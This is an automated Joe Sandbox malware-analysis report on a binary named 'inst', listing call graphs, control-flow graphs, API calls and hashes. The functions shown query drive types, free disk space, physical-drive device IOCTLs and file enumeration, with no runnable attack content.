EnterCriticalSection 142238->142239 142238->142243 142239->142243 142242 6c6a0182 142242->142233 142242->142243 142275 6c6975cf 142242->142275 142297 6c693c85 53 API calls __lock 142242->142297 142298 6c693cf3 LeaveCriticalSection LeaveCriticalSection _doexit 142242->142298 142272 6c6a0297 142243->142272 142246 6c69fed7 __wopenfile 142245->142246 142247 6c69fef1 142246->142247 142259 6c6a00c5 142246->142259 142314 6c690755 59 API calls 2 library calls 142246->142314 142312 6c69464e 52 API calls __getptd_noexit 142247->142312 142249 6c69fef6 142313 6c68e312 6 API calls 2 library calls 142249->142313 142250 6c6a0123 142309 6c6a8d6c 142250->142309 142255 6c6a00be 142255->142259 142315 6c690755 59 API calls 2 library calls 142255->142315 142257 6c6a00dd 142257->142259 142316 6c690755 59 API calls 2 library calls 142257->142316 142259->142247 142259->142250 142260->142216 142262->142228 142263->142228 142266 6c6976ba EnterCriticalSection 142265->142266 142267 6c6976a7 142265->142267 142266->142242 142268 6c6975cf __mtinitlocknum 51 API calls 142267->142268 142269 6c6976ad 142268->142269 142269->142266 142300 6c69082b 52 API calls 3 library calls 142269->142300 142271 6c6976b9 142271->142266 142301 6c6975b8 LeaveCriticalSection 142272->142301 142274 6c6a029e 142274->142236 142276 6c6975db 142275->142276 142277 6c6975eb 142276->142277 142278 6c697603 142276->142278 142302 6c6983d8 52 API calls 2 library calls 142277->142302 142280 6c697615 __malloc_crt 142278->142280 142288 6c697611 142278->142288 142282 6c697623 142280->142282 142283 6c697632 142280->142283 142281 6c6975f0 142303 6c69822d 52 API calls 6 library calls 142281->142303 142305 6c69464e 52 API calls __getptd_noexit 142282->142305 142285 6c697692 __lock 51 API calls 142283->142285 142287 6c697639 142285->142287 142293 6c69765e 142287->142293 142306 6c69ca1e InitializeCriticalSectionAndSpinCount 142287->142306 142288->142242 142289 6c6975f7 142304 6c69087f GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 142289->142304 142308 6c697689 LeaveCriticalSection _doexit 142293->142308 142295 6c69764c 142295->142293 142307 6c69464e 52 API calls __getptd_noexit 142295->142307 142297->142242 142298->142242 142299->142238 142300->142271 142301->142274 142302->142281 142303->142289 142305->142288 142306->142295 142307->142293 142308->142288 142317 6c6a8ca0 142309->142317 142312->142249 142314->142255 142315->142257 142316->142259 142318 6c6a8cac 142317->142318 142319 6c6a8cbf 142318->142319 142322 6c6a8cfd 142318->142322 142391 6c69464e 52 API calls __getptd_noexit 142319->142391 142328 6c6a8580 142322->142328 142443 a929d7 142444 a929e1 142443->142444 142445 a929e5 TlsGetValue 142443->142445 142448 a916e2 142444->142448 142445->142444 142449 a916f7 142448->142449 142452 a91709 142448->142452 142455 a8de82 __VEC_memcpy ___sbh_free_block 142449->142455 142451 a917cb 142452->142451 142453 a9174e GetTickCount 142452->142453 142454 a9175f 142453->142454 142454->142451 142455->142452 142456 6c639c1c 142457 6c639c25 RegisterClipboardFormatW 142456->142457 142458 6c639c3f SmartDisableIME 142456->142458 142457->142458

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 729 ac592d-ac5969 GetDriveTypeW 730 ac596b-ac5973 729->730 731 ac5975-ac5996 call af4550 GetDiskFreeSpaceExW 729->731 732 ac59b6-ac59c5 call a8cc03 730->732 736 ac5998-ac59a0 731->736 737 ac59a2-ac59a5 731->737 740 ac5a9e-ac5aab call af4647 732->740 739 ac59a8-ac59aa 736->739 737->739 741 ac59ac 739->741 742 ac59ca-ac59cd 739->742 741->732 744 ac59ae-ac59b4 741->744 746 ac5a57-ac5a7a call afa970 742->746 747 ac59d3 742->747 744->732 744->742 756 ac5a7c-ac5a7d 746->756 757 ac5a8d-ac5a8f 746->757 749 ac59dd-ac59fd call afa970 747->749 750 ac59d5-ac59db 747->750 759 ac59ff-ac5a05 749->759 760 ac5a07-ac5a0e 749->760 750->749 752 ac5a13-ac5a15 750->752 752->746 755 ac5a17 752->755 762 ac5a19-ac5a1f 755->762 763 ac5a21-ac5a44 call afa970 755->763 758 ac5a82-ac5a8b call a8cc03 756->758 761 ac5a94-ac5a9a call a8cc03 757->761 770 ac5a9d 758->770 759->758 760->761 761->770 762->746 762->763 771 ac5a4e-ac5a55 763->771 772 ac5a46-ac5a4c 763->772 770->740 771->761 772->758
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __aulldiv$DiskDriveFreeSpaceType_memset
                                                                                                                                                                                                                      • String ID: %d Bytes$%d GB$%d KB$%d MB$%d.%d GB$%d.%d KB$%d.%d MB$c:\
                                                                                                                                                                                                                      • API String ID: 3571217518-3034477485
                                                                                                                                                                                                                      • Opcode ID: 1e50d5ae82900a17607b73d37972198517de951a3bd2d0f65fcfff1bc756e1a6
                                                                                                                                                                                                                      • Instruction ID: 06205a386ba7d022283da15a1f9940b07dac6b6a8ce6b620e37fac85dfda0aa1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1e50d5ae82900a17607b73d37972198517de951a3bd2d0f65fcfff1bc756e1a6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9B41F8B1D00A09BACB08DB76DD8AFBF76F9DB45740F22017EF506F2180E970A9408661

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 773 ace945-ace981 GetDriveTypeW 774 ace98d-ace9ae call af4550 GetDiskFreeSpaceExW 773->774 775 ace983-ace98b 773->775 781 ace9ba-ace9bd 774->781 782 ace9b0-ace9b8 774->782 776 ace9ce-ace9dd call a8cc03 775->776 783 aceab6-aceac3 call af4647 776->783 784 ace9c0-ace9c2 781->784 782->784 785 ace9c4 784->785 786 ace9e2-ace9e5 784->786 785->776 791 ace9c6-ace9cc 785->791 789 acea6f-acea92 call afa970 786->789 790 ace9eb 786->790 798 acea94-acea95 789->798 799 aceaa5-aceaa7 789->799 793 ace9ed-ace9f3 790->793 794 ace9f5-acea15 call afa970 790->794 791->776 791->786 793->794 795 acea2b-acea2d 793->795 803 acea1f-acea26 794->803 804 acea17-acea1d 794->804 795->789 801 acea2f 795->801 802 acea9a-aceaa3 call a8cc03 798->802 805 aceaac-aceab2 call a8cc03 799->805 806 acea39-acea5c call afa970 801->806 807 acea31-acea37 801->807 816 aceab5 802->816 803->805 804->802 805->816 814 acea5e-acea64 806->814 815 acea66-acea6d 806->815 807->789 807->806 814->802 815->805 816->783
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __aulldiv$DiskDriveFreeSpaceType_memset
                                                                                                                                                                                                                      • String ID: %d Bytes$%d GB$%d KB$%d MB$%d.%d GB$%d.%d KB$%d.%d MB$c:\
                                                                                                                                                                                                                      • API String ID: 3571217518-3034477485
                                                                                                                                                                                                                      • Opcode ID: 1e50d5ae82900a17607b73d37972198517de951a3bd2d0f65fcfff1bc756e1a6
                                                                                                                                                                                                                      • Instruction ID: edb6b5e195339440635a9729c331668f7687a40cc8c7f235ee5a04df7943c14b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1e50d5ae82900a17607b73d37972198517de951a3bd2d0f65fcfff1bc756e1a6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8441C8B5D002097ECB14EB65DD46FBFB6BDEB59741F22042EF606F3190E970890086A5
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00AE42FD
                                                                                                                                                                                                                      • GetDriveTypeW.KERNEL32(?,0000000C), ref: 00AE4327
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00AE438A
                                                                                                                                                                                                                      • QueryDosDeviceW.KERNEL32(?,00000000,00000400,00000400,?,?,\\.\), ref: 00AE43BA
                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00AE43D6
                                                                                                                                                                                                                      • __wcsnicmp.LIBCMT ref: 00AE43E1
                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,00020000,00000001,00000000,00000003,00000080,00000000,000000FF,?,?,\\.\), ref: 00AE4418
                                                                                                                                                                                                                      • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 00AE4461
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,\\.\), ref: 00AE446C
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,\\.\), ref: 00AE4489
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseDeviceHandle$ControlCreateDriveFileH_prolog3QueryType__wcsnicmp_memset_wcslen
                                                                                                                                                                                                                      • String ID: \Device\Harddisk$\\.\
                                                                                                                                                                                                                      • API String ID: 3469461504-3168084310
                                                                                                                                                                                                                      • Opcode ID: d908e9b294321964e61e607c4e1ddd12551fd0b42f03d9b1d6177a76db0798f3
                                                                                                                                                                                                                      • Instruction ID: d9fa63564d59ec3c7f057a989a54707d2d865b2bb8c391b45de307cf93bd9c85
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d908e9b294321964e61e607c4e1ddd12551fd0b42f03d9b1d6177a76db0798f3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2B4190716002489BDB20EFA5CD81BFE77B8EF08711F104529FA25A72C1DB305A098A65
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00AE1AAD
                                                                                                                                                                                                                        • Part of subcall function 00AA0579: _vswprintf_s.LIBCMT ref: 00AA05AB
                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?), ref: 00AE1AE5
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00AE1B06
                                                                                                                                                                                                                      • DeviceIoControl.KERNEL32(?,0004D02C,?,0000022C,?,0000022C,?,00000000), ref: 00AE1B82
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00AE1B93
                                                                                                                                                                                                                      • _memcpy_s.LIBCMT ref: 00AE1BA5
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,00000000,?,?,?,?,?,?,?), ref: 00AE1BCA
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _memset$CloseControlCreateDeviceFileHandle_memcpy_s_vswprintf_s
                                                                                                                                                                                                                      • String ID: \\.\PHYSICALDRIVE%d
                                                                                                                                                                                                                      • API String ID: 2739630944-613073274
                                                                                                                                                                                                                      • Opcode ID: 4ba97d89a55a86ab0ca1ec5d7c0291d83dd35cb3d6211233f4e77a579b672192
                                                                                                                                                                                                                      • Instruction ID: e95f118c064d708ac1dcba8330d9e08fe78d997cf2d59dc7f6663abc3a9ec000
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4ba97d89a55a86ab0ca1ec5d7c0291d83dd35cb3d6211233f4e77a579b672192
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B41F871901298ABDB31DFA8DC45FDE7BA8AF09714F10051AEA18EB281E6719A44CF60
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00AE1918
                                                                                                                                                                                                                        • Part of subcall function 00AA0579: _vswprintf_s.LIBCMT ref: 00AA05AB
                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?), ref: 00AE194F
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00AE196D
                                                                                                                                                                                                                      • DeviceIoControl.KERNEL32(?,0007C088,?,00000021,?,00000210,?,00000000), ref: 00AE19E2
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00AE19F5
                                                                                                                                                                                                                      • _memcpy_s.LIBCMT ref: 00AE1A07
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?), ref: 00AE1A2F
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _memset$CloseControlCreateDeviceFileHandle_memcpy_s_vswprintf_s
                                                                                                                                                                                                                      • String ID: \\.\PHYSICALDRIVE%d
                                                                                                                                                                                                                      • API String ID: 2739630944-613073274
                                                                                                                                                                                                                      • Opcode ID: 6446de3ab9acfe273f7ead0a619345d3f43d4adc07a2e98eb9899f17d23a8fe0
                                                                                                                                                                                                                      • Instruction ID: 7c9369e00d2c42434f984f02a0cbe7ef776ca838201a19fa98b16159e71a1525
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6446de3ab9acfe273f7ead0a619345d3f43d4adc07a2e98eb9899f17d23a8fe0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 77411C7190028CAFDF31DFA8DC85BEE7BACAB09305F10452ABA58AB182D6715704CF60
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00A82750: _vswprintf_s.LIBCMT ref: 00A82783
                                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 00AF2292
                                                                                                                                                                                                                      • DeviceIoControl.KERNEL32 ref: 00AF22D8
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00AF22E3
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00AF2358
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00AF23D3
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseHandle$ControlCreateDeviceFile_memset_vswprintf_s
                                                                                                                                                                                                                      • String ID: GenuineIntel:0f8bfbff$\\.\PhysicalDrive%d
                                                                                                                                                                                                                      • API String ID: 759969516-2564646230
                                                                                                                                                                                                                      • Opcode ID: 7593da1d3b45a4b05e74582526a7f615f967db9b02f25a301a9b6a4f1bd41b66
                                                                                                                                                                                                                      • Instruction ID: cdbc62d4543d59a54afb727bdb96a8818b7c2ecbfef62cd682c0b4aaac52521a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7593da1d3b45a4b05e74582526a7f615f967db9b02f25a301a9b6a4f1bd41b66
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B3519AB0508744AFE370DF64CC81BABB7E8AB88705F404A2DF699D7281E77499098B57
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00AE2177
                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,00000038), ref: 00AE21BD
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00AE21DF
                                                                                                                                                                                                                      • DeviceIoControl.KERNEL32(?,0004D030,?,00000028,?,00000028,?,00000000), ref: 00AE2236
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00AE226C
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,00000038), ref: 00AE22A9
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _memset$CloseControlCreateDeviceFileH_prolog3Handle
                                                                                                                                                                                                                      • String ID: \\.\PHYSICALDRIVE%d
                                                                                                                                                                                                                      • API String ID: 1408917728-613073274
                                                                                                                                                                                                                      • Opcode ID: 69567b7e03546c7cb5ff2a959ab11a59196c4c8b5daaa866b7873842e03dcdb2
                                                                                                                                                                                                                      • Instruction ID: fd62447266bc55b767c80f77540a77d7f2295971522fe395225eb81092f9e301
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 69567b7e03546c7cb5ff2a959ab11a59196c4c8b5daaa866b7873842e03dcdb2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B6414DB1A0024CAFDB21EFA4DD45AEF77B8EF48704F00452AF915A7292EB745A058B64
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00AE1C3E
                                                                                                                                                                                                                        • Part of subcall function 00AA0579: _vswprintf_s.LIBCMT ref: 00AA05AB
                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,?,?,?,00000000,?), ref: 00AE1C6F
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00AE1C90
                                                                                                                                                                                                                      • DeviceIoControl.KERNEL32(?,0004D008,?,0000003C,?,0000022D,?,00000000), ref: 00AE1CF8
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00AE1D29
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _memset$CloseControlCreateDeviceFileHandle_vswprintf_s
                                                                                                                                                                                                                      • String ID: SCSIDISK$\\.\PHYSICALDRIVE%d
                                                                                                                                                                                                                      • API String ID: 3752575622-3226356902
                                                                                                                                                                                                                      • Opcode ID: 316acabf2617c35ee6c9eed52be9c3738789bb53a046b297c744c1857b21605e
                                                                                                                                                                                                                      • Instruction ID: 16f086ba3435ca842f34cfeef2c98d7a28ef01a47ad3748a19c969e5f4b8be10
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 316acabf2617c35ee6c9eed52be9c3738789bb53a046b297c744c1857b21605e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D310FB194028CAFEF32DFA4DC85EDE7BACAB09704F14411AF918EB191D7715604CB11
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C5ED57F: FindClose.KERNEL32(?,?,6C5EE2C1,?,?,00000000,6C5FDE81,?,?,?,?,?,?,00000034), ref: 6C5ED599
                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000034), ref: 6C5EE2E3
                                                                                                                                                                                                                      • GetFullPathNameW.KERNEL32(?,00000104,?,00000000,00000000,?,?,?,?,?,?,?,?,?,00000034), ref: 6C5EE300
                                                                                                                                                                                                                      • SetLastError.KERNEL32(0000007B,?,?,?,?,?,?,?,?,?,00000034), ref: 6C5EE313
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,00000000,6C5FDE81,?,?,?,?,?,?,00000034), ref: 6C5EE31E
                                                                                                                                                                                                                      • _wcsrchr.LIBCMT ref: 6C5EE32F
                                                                                                                                                                                                                      • _wcsrchr.LIBCMT ref: 6C5EE339
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Find_wcsrchr$CloseErrorFileFirstFullLastNamePathlstrlen
                                                                                                                                                                                                                      • String ID: *.*
